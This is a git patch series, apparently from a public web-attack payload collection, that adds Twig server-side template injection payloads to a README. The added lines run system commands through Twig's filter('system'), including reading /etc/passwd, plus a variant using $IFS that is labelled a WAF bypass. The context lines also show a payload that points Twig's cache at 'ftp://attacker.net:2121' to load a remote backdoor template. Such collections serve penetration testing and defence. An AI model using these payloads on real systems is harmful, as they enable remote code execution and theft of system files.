From 8b78c2fe71e7eebe7548f20eb2348c1151a870e1 Mon Sep 17 00:00:00 2001 From: SakiiR SakiiR Date: Sun, 29 Mar 2020 23:19:27 +0200 Subject: [PATCH 1/2] Added filter(system) twig RCE --- Server Side Template Injection/README.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 0f780ee..9bf3241 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -157,6 +157,8 @@ $output = $twig > render ( {{self}} {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} +{{['id']|filter('system')}} +{{['cat\x20/etc/passwd']|filter('system')}} ``` Example with an email passing FILTER_VALIDATE_EMAIL PHP. From 38c273ff00da234058b477275826323af3429a58 Mon Sep 17 00:00:00 2001 From: SakiiR SakiiR Date: Sun, 29 Mar 2020 23:23:26 +0200 Subject: [PATCH 2/2] Added IFS (WAF bypass) to Symfony Twig RCE --- Server Side Template Injection/README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index 9bf3241..9fc9ac5 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -159,6 +159,7 @@ $output = $twig > render ( {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}} {{['id']|filter('system')}} {{['cat\x20/etc/passwd']|filter('system')}} +{{['cat$IFS/etc/passwd']|filter('system')}} ``` Example with an email passing FILTER_VALIDATE_EMAIL PHP.